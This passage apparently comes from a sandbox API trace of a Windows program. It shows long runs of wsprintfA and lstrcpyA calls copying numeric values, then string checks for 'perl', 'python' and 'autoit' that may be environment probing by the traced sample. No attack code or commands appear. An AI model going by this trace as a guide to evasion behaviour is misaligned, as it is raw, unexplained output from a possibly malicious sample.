lpString1=0x430800, lpString2="1428" | out: lpString1="1428") returned="1428" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="360") returned 3 [0158.077] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3336032") returned 7 [0158.077] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3336392") returned 7 [0158.077] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336392" | out: lpString1="3336392") returned="3336392" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.077] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="2000") returned 4 [0158.077] lstrcpyA (in: lpString1=0x430800, lpString2="2000" | out: lpString1="2000") returned="2000" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="384") returned 3 [0158.078] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3336392") returned 7 [0158.078] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3336776") returned 7 [0158.078] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336776" | out: lpString1="3336776") returned="3336776" [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.078] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1088") returned 4 [0158.078] lstrcpyA (in: lpString1=0x430800, lpString2="1088" | out: lpString1="1088") returned="1088" [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.079] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.079] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337120" | out: lpString1="3337120") returned="3337120" [0158.079] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.079] lstrcpyA (in: lpString1=0x430800, lpString2="860" | out: lpString1="860") returned="860" [0158.079] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.079] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337464" | out: lpString1="3337464") returned="3337464" [0158.079] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.079] lstrcpyA (in: lpString1=0x430800, lpString2="560" | out: lpString1="560") returned="560" [0158.079] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.079] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337792" | out: lpString1="3337792") returned="3337792" [0158.080] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.080] lstrcpyA (in: lpString1=0x430800, lpString2="1216" | out: lpString1="1216") returned="1216" [0158.080] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.080] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338176" | out: lpString1="3338176") returned="3338176" [0158.080] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.080] lstrcpyA (in: lpString1=0x430800, lpString2="1180" | out: lpString1="1180") returned="1180" [0158.080] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.080] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338536" | out: lpString1="3338536") returned="3338536" [0158.080] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.080] lstrcpyA (in: lpString1=0x430800, lpString2="328" | out: lpString1="328") returned="328" [0158.080] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.080] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338888" | out: lpString1="3338888") returned="3338888" [0158.081] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.081] lstrcpyA (in: lpString1=0x430800, lpString2="564" | out: lpString1="564") returned="564" [0158.081] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.081] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339240" | out: lpString1="3339240") returned="3339240" [0158.081] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.081] lstrcpyA (in: lpString1=0x430800, lpString2="1276" | out: lpString1="1276") returned="1276" [0158.081] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.081] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339576" | out: lpString1="3339576") returned="3339576" [0158.081] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.081] lstrcpyA (in: lpString1=0x430800, lpString2="1392" | out: lpString1="1392") returned="1392" [0158.081] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.081] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339928" | out: lpString1="3339928") returned="3339928" [0158.082] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.082] lstrcpyA (in: lpString1=0x430800, lpString2="712" | out: lpString1="712") returned="712" [0158.082] lstrcpyA (in: lpString1=0x431000, lpString2="368" | out: lpString1="368") returned="368" [0158.082] lstrcpyA (in: lpString1=0x321ba8, lpString2="3340296" | out: lpString1="3340296") returned="3340296" [0158.082] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.082] lstrcpyA (in: lpString1=0x430800, lpString2="1744" | out: lpString1="1744") returned="1744" [0158.082] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.082] lstrcpyA (in: lpString1=0x321ba8, lpString2="3340656" | out: lpString1="3340656") returned="3340656" [0158.082] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.082] lstrcpyA (in: lpString1=0x430800, lpString2="1680" | out: lpString1="1680") returned="1680" [0158.082] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.082] lstrcpyA (in: lpString1=0x321ba8, lpString2="3341008" | out: lpString1="3341008") returned="3341008" [0158.083] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.083] lstrcpyA (in: lpString1=0x430800, lpString2="388" | out: lpString1="388") returned="388" [0158.083] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.083] lstrcpyA (in: lpString1=0x321ba8, lpString2="3341392" | out: lpString1="3341392") returned="3341392" [0158.083] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.083] lstrcpyA (in: lpString1=0x430800, lpString2="2476" | out: lpString1="2476") returned="2476" [0158.083] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.083] lstrcpyA (in: lpString1=0x321ba8, lpString2="3343584" | out: lpString1="3343584") returned="3343584" [0158.083] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.083] lstrcpyA (in: lpString1=0x430800, lpString2="2516" | out: lpString1="2516") returned="2516" [0158.083] lstrcpyA (in: lpString1=0x431000, lpString2="592" | out: lpString1="592") returned="592" [0158.083] lstrcpyA (in: lpString1=0x321ba8, lpString2="3344176" | out: lpString1="3344176") returned="3344176" [0158.084] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.084] lstrcpyA (in: lpString1=0x430800, lpString2="2552" | out: lpString1="2552") returned="2552" [0158.084] lstrcpyA (in: lpString1=0x431000, lpString2="592" | out: lpString1="592") returned="592" [0158.084] lstrcpyA (in: lpString1=0x321ba8, lpString2="3344768" | out: lpString1="3344768") returned="3344768" [0158.084] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.084] lstrcpyA (in: lpString1=0x430800, lpString2="2592" | out: lpString1="2592") returned="2592" [0158.084] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.084] lstrcpyA (in: lpString1=0x321ba8, lpString2="3345296" | out: lpString1="3345296") returned="3345296" [0158.084] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.084] lstrcpyA (in: lpString1=0x430800, lpString2="2624" | out: lpString1="2624") returned="2624" [0158.084] lstrcpyA (in: lpString1=0x431000, lpString2="976" | out: lpString1="976") returned="976" [0158.085] lstrcpyA (in: lpString1=0x321ba8, lpString2="3346272" | out: lpString1="3346272") returned="3346272" [0158.085] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.085] lstrcpyA (in: lpString1=0x430800, lpString2="2948" | out: lpString1="2948") returned="2948" [0158.085] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.085] lstrcpyA (in: lpString1=0x321ba8, lpString2="3346800" | out: lpString1="3346800") returned="3346800" [0158.085] lstrcpyA (in: lpString1=0x431800, lpString2="3064" | out: lpString1="3064") returned="3064" [0158.085] lstrcpyA (in: lpString1=0x430800, lpString2="1224" | out: lpString1="1224") returned="1224" [0158.085] lstrcpyA (in: lpString1=0x431000, lpString2="0" | out: lpString1="0") returned="0" [0158.085] lstrcpyA (in: lpString1=0x321ba8, lpString2="3304744" | out: lpString1="3304744") returned="3304744" [0158.085] lstrcpyA (in: lpString1=0x431800, lpString2="0" | out: lpString1="0") returned="0" [0158.085] lstrcpyA (in: lpString1=0x430800, lpString2="0" | out: lpString1="0") returned="0" [0158.085] lstrcpyA (in: lpString1=0x431000, lpString2="248" | out: lpString1="248") returned="248" [0158.086] lstrcpyA (in: lpString1=0x321ba8, lpString2="3304992" | out: lpString1="3304992") returned="3304992" [0158.086] lstrcpyA (in: lpString1=0x431800, lpString2="4" | out: lpString1="4") returned="4" [0158.086] lstrcpyA (in: lpString1=0x430800, lpString2="3310360" | out: lpString1="3310360") returned="3310360" [0158.086] lstrcpyA (in: lpString1=0x431000, lpString2="5384" | out: lpString1="5384") returned="5384" [0158.086] lstrcpyA (in: lpString1=0x321ba8, lpString2="3310376" | out: lpString1="3310376") returned="3310376" [0158.086] lstrcpyA (in: lpString1=0x431800, lpString2="264" | out: lpString1="264") returned="264" [0158.086] lstrcpyA (in: lpString1=0x430800, lpString2="3310688" | out: lpString1="3310688") returned="3310688" [0158.086] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.086] lstrcpyA (in: lpString1=0x321ba8, lpString2="3310712" | out: lpString1="3310712") returned="3310712" [0158.086] lstrcpyA (in: lpString1=0x431800, lpString2="332" | out: lpString1="332") returned="332" [0158.086] lstrcpyA (in: lpString1=0x430800, lpString2="3311472" | out: lpString1="3311472") returned="3311472" [0158.086] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.087] lstrcpyA (in: lpString1=0x321ba8, lpString2="3311496" | out: lpString1="3311496") returned="3311496" [0158.087] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.087] lstrcpyA (in: lpString1=0x430800, lpString2="3311872" | out: lpString1="3311872") returned="3311872" [0158.087] lstrcpyA (in: lpString1=0x431000, lpString2="400" | out: lpString1="400") returned="400" [0158.087] lstrcpyA (in: lpString1=0x321ba8, lpString2="3311896" | out: lpString1="3311896") returned="3311896" [0158.087] lstrcpyA (in: lpString1=0x431800, lpString2="392" | out: lpString1="392") returned="392" [0158.087] lstrcpyA (in: lpString1=0x430800, lpString2="3312656" | out: lpString1="3312656") returned="3312656" [0158.087] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.087] lstrcpyA (in: lpString1=0x321ba8, lpString2="3312680" | out: lpString1="3312680") returned="3312680" [0158.087] lstrcpyA (in: lpString1=0x431800, lpString2="432" | out: lpString1="432") returned="432" [0158.087] lstrcpyA (in: lpString1=0x430800, lpString2="3313120" | out: lpString1="3313120") returned="3313120" [0158.087] lstrcpyA (in: lpString1=0x431000, lpString2="472" | out: lpString1="472") returned="472" [0158.088] lstrcpyA (in: lpString1=0x321ba8, lpString2="3313152" | out: lpString1="3313152") returned="3313152" [0158.088] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.088] lstrcpyA (in: lpString1=0x430800, lpString2="3314040" | out: lpString1="3314040") returned="3314040" [0158.088] lstrcpyA (in: lpString1=0x431000, lpString2="920" | out: lpString1="920") returned="920" [0158.088] lstrcpyA (in: lpString1=0x321ba8, lpString2="3314072" | out: lpString1="3314072") returned="3314072" [0158.088] lstrcpyA (in: lpString1=0x431800, lpString2="484" | out: lpString1="484") returned="484" [0158.088] lstrcpyA (in: lpString1=0x430800, lpString2="3314704" | out: lpString1="3314704") returned="3314704" [0158.088] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.088] lstrcpyA (in: lpString1=0x321ba8, lpString2="3314728" | out: lpString1="3314728") returned="3314728" [0158.088] lstrcpyA (in: lpString1=0x431800, lpString2="492" | out: lpString1="492") returned="492" [0158.088] lstrcpyA (in: lpString1=0x430800, lpString2="3315552" | out: lpString1="3315552") returned="3315552" [0158.088] lstrcpyA (in: lpString1=0x431000, lpString2="840" | out: lpString1="840") returned="840" [0158.089] lstrcpyA (in: lpString1=0x321ba8, lpString2="3315568" | out: lpString1="3315568") returned="3315568" [0158.089] lstrcpyA (in: lpString1=0x431800, lpString2="600" | out: lpString1="600") returned="600" [0158.089] lstrcpyA (in: lpString1=0x430800, lpString2="3316456" | out: lpString1="3316456") returned="3316456" [0158.089] lstrcpyA (in: lpString1=0x431000, lpString2="912" | out: lpString1="912") returned="912" [0158.089] lstrcpyA (in: lpString1=0x321ba8, lpString2="3316480" | out: lpString1="3316480") returned="3316480" [0158.089] lstrcpyA (in: lpString1=0x431800, lpString2="664" | out: lpString1="664") returned="664" [0158.089] lstrcpyA (in: lpString1=0x430800, lpString2="3317176" | out: lpString1="3317176") returned="3317176" [0158.089] lstrcpyA (in: lpString1=0x431000, lpString2="720" | out: lpString1="720") returned="720" [0158.089] lstrcpyA (in: lpString1=0x321ba8, lpString2="3317200" | out: lpString1="3317200") returned="3317200" [0158.089] lstrcpyA (in: lpString1=0x431800, lpString2="716" | out: lpString1="716") returned="716" [0158.089] lstrcpyA (in: lpString1=0x430800, lpString2="3318792" | out: lpString1="3318792") returned="3318792" [0158.090] lstrcpyA (in: lpString1=0x431000, lpString2="1616" | out: lpString1="1616") returned="1616" [0158.090] lstrcpyA (in: lpString1=0x321ba8, lpString2="3318816" | out: lpString1="3318816") returned="3318816" [0158.090] lstrcpyA (in: lpString1=0x431800, lpString2="828" | out: lpString1="828") returned="828" [0158.090] lstrcpyA (in: lpString1=0x430800, lpString2="3320280" | out: lpString1="3320280") returned="3320280" [0158.090] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.090] lstrcpyA (in: lpString1=0x321ba8, lpString2="3320304" | out: lpString1="3320304") returned="3320304" [0158.090] lstrcpyA (in: lpString1=0x431800, lpString2="872" | out: lpString1="872") returned="872" [0158.090] lstrcpyA (in: lpString1=0x430800, lpString2="3322472" | out: lpString1="3322472") returned="3322472" [0158.090] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.090] lstrcpyA (in: lpString1=0x321ba8, lpString2="3322496" | out: lpString1="3322496") returned="3322496" [0158.090] lstrcpyA (in: lpString1=0x431800, lpString2="932" | out: lpString1="932") returned="932" [0158.091] lstrcpyA (in: lpString1=0x430800, lpString2="3323128" | out: lpString1="3323128") returned="3323128" [0158.091] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.091] lstrcpyA (in: lpString1=0x321ba8, lpString2="3323152" | out: lpString1="3323152") returned="3323152" [0158.091] lstrcpyA (in: lpString1=0x431800, lpString2="1008" | out: lpString1="1008") returned="1008" [0158.091] lstrcpyA (in: lpString1=0x430800, lpString2="3324232" | out: lpString1="3324232") returned="3324232" [0158.091] lstrcpyA (in: lpString1=0x431000, lpString2="1104" | out: lpString1="1104") returned="1104" [0158.091] lstrcpyA (in: lpString1=0x321ba8, lpString2="3324256" | out: lpString1="3324256") returned="3324256" [0158.091] lstrcpyA (in: lpString1=0x431800, lpString2="536" | out: lpString1="536") returned="536" [0158.091] lstrcpyA (in: lpString1=0x430800, lpString2="3325464" | out: lpString1="3325464") returned="3325464" [0158.091] lstrcpyA (in: lpString1=0x431000, lpString2="1232" | out: lpString1="1232") returned="1232" [0158.091] lstrcpyA (in: lpString1=0x321ba8, lpString2="3325488" | out: lpString1="3325488") returned="3325488" [0158.091] lstrcpyA (in: lpString1=0x431800, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.092] lstrcpyA (in: lpString1=0x430800, lpString2="3326504" | out: lpString1="3326504") returned="3326504" [0158.092] lstrcpyA (in: lpString1=0x431000, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.092] lstrcpyA (in: lpString1=0x321ba8, lpString2="3326528" | out: lpString1="3326528") returned="3326528" [0158.092] lstrcpyA (in: lpString1=0x431800, lpString2="1068" | out: lpString1="1068") returned="1068" [0158.092] lstrcpyA (in: lpString1=0x430800, lpString2="3327992" | out: lpString1="3327992") returned="3327992" [0158.092] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.092] lstrcpyA (in: lpString1=0x321ba8, lpString2="3328016" | out: lpString1="3328016") returned="3328016" [0158.092] lstrcpyA (in: lpString1=0x431800, lpString2="1564" | out: lpString1="1564") returned="1564" [0158.092] lstrcpyA (in: lpString1=0x430800, lpString2="3328840" | out: lpString1="3328840") returned="3328840" [0158.092] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.092] lstrcpyA (in: lpString1=0x321ba8, lpString2="3328872" | out: lpString1="3328872") returned="3328872" [0158.093] lstrcpyA (in: lpString1=0x431800, lpString2="1632" | out: lpString1="1632") returned="1632" [0158.093] lstrcpyA (in: lpString1=0x430800, lpString2="3329376" | out: lpString1="3329376") returned="3329376" [0158.093] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.093] lstrcpyA (in: lpString1=0x321ba8, lpString2="3329400" | out: lpString1="3329400") returned="3329400" [0158.093] lstrcpyA (in: lpString1=0x431800, lpString2="1648" | out: lpString1="1648") returned="1648" [0158.093] lstrcpyA (in: lpString1=0x430800, lpString2="3329968" | out: lpString1="3329968") returned="3329968" [0158.093] lstrcpyA (in: lpString1=0x431000, lpString2="584" | out: lpString1="584") returned="584" [0158.093] lstrcpyA (in: lpString1=0x321ba8, lpString2="3329984" | out: lpString1="3329984") returned="3329984" [0158.093] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.093] lstrcpyA (in: lpString1=0x430800, lpString2="3332088" | out: lpString1="3332088") returned="3332088" [0158.093] lstrcpyA (in: lpString1=0x431000, lpString2="2136" | out: lpString1="2136") returned="2136" [0158.094] lstrcpyA (in: lpString1=0x321ba8, lpString2="3332120" | out: lpString1="3332120") returned="3332120" [0158.094] lstrcpyA (in: lpString1=0x431800, lpString2="1748" | out: lpString1="1748") returned="1748" [0158.094] lstrcpyA (in: lpString1=0x430800, lpString2="3332624" | out: lpString1="3332624") returned="3332624" [0158.094] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.094] lstrcpyA (in: lpString1=0x321ba8, lpString2="3332648" | out: lpString1="3332648") returned="3332648" [0158.094] lstrcpyA (in: lpString1=0x431800, lpString2="1192" | out: lpString1="1192") returned="1192" [0158.094] lstrcpyA (in: lpString1=0x430800, lpString2="3334112" | out: lpString1="3334112") returned="3334112" [0158.094] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.094] lstrcpyA (in: lpString1=0x321ba8, lpString2="3334136" | out: lpString1="3334136") returned="3334136" [0158.094] lstrcpyA (in: lpString1=0x431800, lpString2="1612" | out: lpString1="1612") returned="1612" [0158.094] lstrcpyA (in: lpString1=0x430800, lpString2="3334960" | out: lpString1="3334960") returned="3334960" [0158.094] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.095] lstrcpyA (in: lpString1=0x321ba8, lpString2="3334992" | out: lpString1="3334992") returned="3334992" [0158.095] lstrcpyA (in: lpString1=0x431800, lpString2="684" | out: lpString1="684") returned="684" [0158.095] lstrcpyA (in: lpString1=0x430800, lpString2="3335304" | out: lpString1="3335304") returned="3335304" [0158.095] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.095] lstrcpyA (in: lpString1=0x321ba8, lpString2="3335352" | out: lpString1="3335352") returned="3335352" [0158.095] lstrcpyA (in: lpString1=0x431800, lpString2="528" | out: lpString1="528") returned="528" [0158.095] lstrcpyA (in: lpString1=0x430800, lpString2="3335664" | out: lpString1="3335664") returned="3335664" [0158.095] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.095] lstrcpyA (in: lpString1=0x321ba8, lpString2="3335680" | out: lpString1="3335680") returned="3335680" [0158.095] lstrcpyA (in: lpString1=0x431800, lpString2="1852" | out: lpString1="1852") returned="1852" [0158.095] lstrcpyA (in: lpString1=0x430800, lpString2="3335992" | out: lpString1="3335992") returned="3335992" [0158.095] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.096] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336032" | out: lpString1="3336032") returned="3336032" [0158.096] lstrcpyA (in: lpString1=0x431800, lpString2="1428" | out: lpString1="1428") returned="1428" [0158.096] lstrcpyA (in: lpString1=0x430800, lpString2="3336344" | out: lpString1="3336344") returned="3336344" [0158.096] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.096] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336392" | out: lpString1="3336392") returned="3336392" [0158.096] lstrcpyA (in: lpString1=0x431800, lpString2="2000" | out: lpString1="2000") returned="2000" [0158.096] lstrcpyA (in: lpString1=0x430800, lpString2="3336704" | out: lpString1="3336704") returned="3336704" [0158.096] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.096] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336776" | out: lpString1="3336776") returned="3336776" [0158.096] lstrcpyA (in: lpString1=0x431800, lpString2="1088" | out: lpString1="1088") returned="1088" [0158.096] lstrcpyA (in: lpString1=0x430800, lpString2="3337088" | out: lpString1="3337088") returned="3337088" [0158.097] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.097] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337120" | out: lpString1="3337120") returned="3337120" [0158.097] lstrcpyA (in: lpString1=0x431800, lpString2="860" | out: lpString1="860") returned="860" [0158.097] lstrcpyA (in: lpString1=0x430800, lpString2="3337432" | out: lpString1="3337432") returned="3337432" [0158.097] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.097] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337464" | out: lpString1="3337464") returned="3337464" [0158.097] lstrcpyA (in: lpString1=0x431800, lpString2="560" | out: lpString1="560") returned="560" [0158.097] lstrcpyA (in: lpString1=0x430800, lpString2="3337776" | out: lpString1="3337776") returned="3337776" [0158.097] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.097] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337792" | out: lpString1="3337792") returned="3337792" [0158.097] lstrcpyA (in: lpString1=0x431800, lpString2="1216" | out: lpString1="1216") returned="1216" [0158.098] lstrcpyA (in: lpString1=0x430800, lpString2="3338104" | out: lpString1="3338104") returned="3338104" [0158.098] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.098] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338176" | out: lpString1="3338176") returned="3338176" [0158.098] lstrcpyA (in: lpString1=0x431800, lpString2="1180" | out: lpString1="1180") returned="1180" [0158.098] lstrcpyA (in: lpString1=0x430800, lpString2="3338488" | out: lpString1="3338488") returned="3338488" [0158.098] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.098] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338536" | out: lpString1="3338536") returned="3338536" [0158.098] lstrcpyA (in: lpString1=0x431800, lpString2="328" | out: lpString1="328") returned="328" [0158.098] lstrcpyA (in: lpString1=0x430800, lpString2="3338848" | out: lpString1="3338848") returned="3338848" [0158.098] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.098] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338888" | out: lpString1="3338888") returned="3338888" [0158.099] lstrcpyA (in: lpString1=0x431800, lpString2="564" | out: lpString1="564") returned="564" [0158.099] lstrcpyA (in: lpString1=0x430800, lpString2="3339200" | out: lpString1="3339200") returned="3339200" [0158.099] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.099] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339240" | out: lpString1="3339240") returned="3339240" [0158.099] lstrcpyA (in: lpString1=0x431800, lpString2="1276" | out: lpString1="1276") returned="1276" [0158.099] lstrcpyA (in: lpString1=0x430800, lpString2="3339552" | out: lpString1="3339552") returned="3339552" [0158.099] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.099] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339576" | out: lpString1="3339576") returned="3339576" [0158.099] lstrcpyA (in: lpString1=0x431800, lpString2="1392" | out: lpString1="1392") returned="1392" [0158.099] lstrcpyA (in: lpString1=0x430800, lpString2="3339888" | out: lpString1="3339888") returned="3339888" [0158.099] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.100] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339928" | out: lpString1="3339928") returned="3339928" [0158.100] lstrcpyA (in: lpString1=0x431800, lpString2="712" | out: lpString1="712") returned="712" [0158.100] lstrcpyA (in: lpString1=0x430800, lpString2="3340240" | out: lpString1="3340240") returned="3340240" [0158.100] lstrcpyA (in: lpString1=0x431000, lpString2="368" | out: lpString1="368") returned="368" [0158.100] lstrcpyA (in: lpString1=0x321ba8, lpString2="3340296" | out: lpString1="3340296") returned="3340296" [0158.100] lstrcpyA (in: lpString1=0x431800, lpString2="1744" | out: lpString1="1744") returned="1744" [0158.100] lstrcpyA (in: lpString1=0x430800, lpString2="3340608" | out: lpString1="3340608") returned="3340608" [0158.100] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.100] lstrcpyA (in: lpString1=0x321ba8, lpString2="3340656" | out: lpString1="3340656") returned="3340656" [0158.101] strstr (_Str="0", _SubStr="perl") returned 0x0 [0158.101] strstr (_Str="0", _SubStr="python") returned 0x0 [0158.101] strstr (_Str="0", _SubStr="autoit") returned 0x0 